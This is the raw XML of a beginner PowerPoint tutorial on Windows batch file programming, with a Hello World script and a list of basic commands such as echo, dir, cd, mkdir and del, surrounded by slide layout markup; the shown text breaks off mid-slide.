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png~c200" ContentType="image/png"/>
  <Default Extension="gif~c200" ContentType="image/gif"/>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media/image38.jpg" ContentType="image/pn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sldIdLst>
    <p:sldId id="256" r:id="rId2"/>
    <p:sldId id="257" r:id="rId3"/>
    <p:sldId id="258" r:id="rId4"/>
    <p:sldId id="277" r:id="rId5"/>
    <p:sldId id="261" r:id="rId6"/>
    <p:sldId id="278" r:id="rId7"/>
    <p:sldId id="262" r:id="rId8"/>
    <p:sldId id="265" r:id="rId9"/>
    <p:sldId id="264" r:id="rId10"/>
    <p:sldId id="260" r:id="rId11"/>
    <p:sldId id="266" r:id="rId12"/>
    <p:sldId id="267" r:id="rId13"/>
    <p:sldId id="268" r:id="rId14"/>
    <p:sldId id="269" r:id="rId15"/>
    <p:sldId id="276" r:id="rId16"/>
    <p:sldId id="270" r:id="rId17"/>
    <p:sldId id="271" r:id="rId18"/>
    <p:sldId id="275" r:id="rId19"/>
    <p:sldId id="272" r:id="rId20"/>
    <p:sldId id="274" r:id="rId21"/>
    <p:sldId id="273" r:id="rId22"/>
    <p:sldId id="279" r:id="rId23"/>
    <p:sldId id="280" r:id="rId24"/>
    <p:sldId id="281" r:id="rId25"/>
    <p:sldId id="282" r:id="rId26"/>
    <p:sldId id="283" r:id="rId27"/>
    <p:sldId id="285" r:id="rId28"/>
    <p:sldId id="284" r:id="rId29"/>
    <p:sldId id="286" r:id="rId30"/>
    <p:sldId id="291" r:id="rId31"/>
    <p:sldId id="287" r:id="rId32"/>
    <p:sldId id="288" r:id="rId33"/>
    <p:sldId id="289" r:id="rId34"/>
    <p:sldId id="290" r:id="rId35"/>
    <p:sldId id="296" r:id="rId36"/>
    <p:sldId id="292" r:id="rId37"/>
    <p:sldId id="293" r:id="rId38"/>
    <p:sldId id="294" r:id="rId39"/>
    <p:sldId id="295"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5" d="100"/>
          <a:sy n="75" d="100"/>
        </p:scale>
        <p:origin x="516"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0" name="Group 9"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="12188825" cy="6872226"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="12188825" cy="6872226"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="9" name="Picture 8" descr="HD-PanelTitle-V.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l="2" r="47673"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="5245268" y="530352"/>
              <a:ext cx="1673352" cy="612648"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="18" name="Picture 17"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r="48819"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="5263556" y="5747514"/>
              <a:ext cx="1636776"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7BEEBE13-976A-4811-88F0-0D1C75C3831C}" type="datetimeFigureOut">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>17-04-2016</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2692397" y="5037663"/>
            <a:ext cx="5214635" cy="279400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8956900" y="5037663"/>
            <a:ext cx="551167" cy="279400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{92535293-7D34-4B36-9305-4E20816A8DBE}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN" dirty="0"/>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363565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smtClean="0"/>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BEEBE13-976A-4811-88F0-0D1C75C3831C}" type="datetimeFigureOut">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>17-04-2016</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92535293-7D34-4B36-9305-4E20816A8DBE}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16173967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BEEBE13-976A-4811-88F0-0D1C75C3831C}" type="datetimeFigureOut">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>17-04-2016</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92535293-7D34-4B36-9305-4E20816A8DBE}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN" dirty="0"/>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9009935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BEEBE13-976A-4811-88F0-0D1C75C3831C}" type="datetimeFigureOut">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>17-04-2016</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92535293-7D34-4B36-9305-4E20816A8DBE}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN" dirty="0"/>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2994830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BEEBE13-976A-4811-88F0-0D1C75C3831C}" type="datetimeFigureOut">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>17-04-2016</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92535293-7D34-4B36-9305-4E20816A8DBE}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="339305255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smtClean="0"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16"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BEEBE13-976A-4811-88F0-0D1C75C3831C}" type="datetimeFigureOut">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>17-04-2016</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92535293-7D34-4B36-9305-4E20816A8DBE}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN" dirty="0"/>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7324376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smtClean="0"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14"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BEEBE13-976A-4811-88F0-0D1C75C3831C}" type="datetimeFigureOut">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>17-04-2016</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92535293-7D34-4B36-9305-4E20816A8DBE}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN" dirty="0"/>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573569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BEEBE13-976A-4811-88F0-0D1C75C3831C}" type="datetimeFigureOut">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>17-04-2016</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92535293-7D34-4B36-9305-4E20816A8DBE}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"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2727257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BEEBE13-976A-4811-88F0-0D1C75C3831C}" type="datetimeFigureOut">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>17-04-2016</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92535293-7D34-4B36-9305-4E20816A8DBE}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN" dirty="0"/>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88719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BEEBE13-976A-4811-88F0-0D1C75C3831C}" type="datetimeFigureOut">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>17-04-2016</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92535293-7D34-4B36-9305-4E20816A8DBE}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="241441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BEEBE13-976A-4811-88F0-0D1C75C3831C}" type="datetimeFigureOut">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>17-04-2016</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92535293-7D34-4B36-9305-4E20816A8DBE}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN" dirty="0"/>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48039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7BEEBE13-976A-4811-88F0-0D1C75C3831C}" type="datetimeFigureOut">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>17-04-2016</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92535293-7D34-4B36-9305-4E20816A8DBE}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>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789855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0671" y="2658533"/>
            <a:ext cx="4718304" cy="576262"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">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0671" y="3243262"/>
            <a:ext cx="4718304" cy="2632605"/>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7BEEBE13-976A-4811-88F0-0D1C75C3831C}" type="datetimeFigureOut">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>17-04-2016</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Footer Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Slide Number Placeholder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{92535293-7D34-4B36-9305-4E20816A8DBE}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN" dirty="0"/>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011522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7BEEBE13-976A-4811-88F0-0D1C75C3831C}" type="datetimeFigureOut">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>17-04-2016</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Footer Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{92535293-7D34-4B36-9305-4E20816A8DBE}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"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594479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BEEBE13-976A-4811-88F0-0D1C75C3831C}" type="datetimeFigureOut">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>17-04-2016</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Footer Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{92535293-7D34-4B36-9305-4E20816A8DBE}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28502477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BEEBE13-976A-4811-88F0-0D1C75C3831C}" type="datetimeFigureOut">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>17-04-2016</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92535293-7D34-4B36-9305-4E20816A8DBE}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN" dirty="0"/>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067706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smtClean="0"/>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smtClean="0"/>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BEEBE13-976A-4811-88F0-0D1C75C3831C}" type="datetimeFigureOut">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>17-04-2016</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92535293-7D34-4B36-9305-4E20816A8DBE}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37918095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0" y="0"/>
            <a:ext cx="12188825" cy="6856215"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="12188825" cy="6856215"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="8" name="Picture 7" descr="HD-PanelContent-V.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r="5093"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="5706471" y="76265"/>
              <a:ext cx="758952"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r="5093"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="5706470" y="6173526"/>
              <a:ext cx="758952"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7BEEBE13-976A-4811-88F0-0D1C75C3831C}" type="datetimeFigureOut">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>17-04-2016</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN" dirty="0"/>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IN" dirty="0"/>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92535293-7D34-4B36-9305-4E20816A8DBE}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="998398123"/>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7.gif"/><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8.gif~c200"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout4.xml"/><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3.gif~c200"/><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8.png~c200"/><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jp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3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3.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout7.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1.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide3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6.jpg"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout7.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image47.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide3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image" Target="../media/image9.gif"/><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4.gi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6.gif"/><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sz="2400" dirty="0" smtClean="0"/>
              <a:t>  A START TO</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="4400" dirty="0" smtClean="0"/>
              <a:t>BATCH </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" dirty="0" smtClean="0"/>
              <a:t>FILE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="4400" dirty="0" smtClean="0"/>
              <a:t> 	PROGRAMMING</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="4400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>BY:- AKSHAY SAINI </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>   	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>+91 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>9872472565</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>      		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>			akkilsl522@gmail.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN"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04861" y="2019297"/>
            <a:ext cx="1219200" cy="1219200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="299833277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273524" y="1047398"/>
            <a:ext cx="5827920" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>How to create a Batch Program ?</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2800" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1273524" y="1686296"/>
            <a:ext cx="9628024" cy="3816429"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2200" dirty="0" smtClean="0"/>
              <a:t>Like any other programing languages, lets start our first program with the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2200" i="1" dirty="0" smtClean="0"/>
              <a:t>‘Hello World’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2200" dirty="0" smtClean="0"/>
              <a:t>program.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" sz="2200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2200" dirty="0" smtClean="0"/>
              <a:t>1. Open up a notepad and type the following.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2200" i="1" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2200" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>@echo off</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2200" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>	Echo Hello World</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2200" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>	pause</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2200" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2200" dirty="0" smtClean="0"/>
              <a:t>2. Save the file with any name you wish, but make sure that you save the file extension with .bat, like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2200" i="1" dirty="0" smtClean="0"/>
              <a:t>‘first.bat’.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2200" dirty="0" smtClean="0"/>
              <a:t>3. Just double click to execute the batch file that you have created now. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2200" dirty="0"/>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2200" dirty="0" smtClean="0"/>
              <a:t>. And you are done!</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="22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01444" y="2299868"/>
            <a:ext cx="2130324" cy="1855444"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18062742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pPr algn="l"/>
                <a:r>
                  <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
                  <a:t>Basic Commands </a:t>
                </a:r>
                <a14:m>
                  <m:oMath xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math">
                    <m:r>
                      <a:rPr lang="en-IN" sz="2000" i="1" dirty="0" smtClean="0">
                        <a:latin typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                      </a:rPr>
                      <m:t>𝑦𝑜𝑢</m:t>
                    </m:r>
                    <m:r>
                      <a:rPr lang="en-IN" sz="2000" i="1" dirty="0" smtClean="0">
                        <a:latin typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                      </a:rPr>
                      <m:t> </m:t>
                    </m:r>
                    <m:r>
                      <a:rPr lang="en-IN" sz="2000" i="1" dirty="0" smtClean="0">
                        <a:latin typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                      </a:rPr>
                      <m:t>𝑠h𝑜𝑢𝑙𝑑</m:t>
                    </m:r>
                    <m:r>
                      <a:rPr lang="en-IN" sz="2000" i="1" dirty="0" smtClean="0">
                        <a:latin typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                      </a:rPr>
                      <m:t> </m:t>
                    </m:r>
                    <m:r>
                      <a:rPr lang="en-IN" sz="2000" i="1" dirty="0" smtClean="0">
                        <a:latin typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                      </a:rPr>
                      <m:t>𝑘𝑛𝑜𝑤</m:t>
                    </m:r>
                  </m:oMath>
                </a14:m>
                <a:endParaRPr lang="en-IN" sz="2000"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0">
                <a:blip r:embed="rId2"/>
                <a:stretch>
                  <a:fillRect l="-2605" b="-1869"/>
                </a:stretch>
              </a:blipFill>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="en-IN">
                    <a:noFill/>
                  </a:rPr>
                  <a:t> </a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </mc:Fallback>
      </mc:AlternateContent>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>Echo</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>Pause</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>Dir  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>Rem </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>Cd </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>Mkdir</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>Del </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Content Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
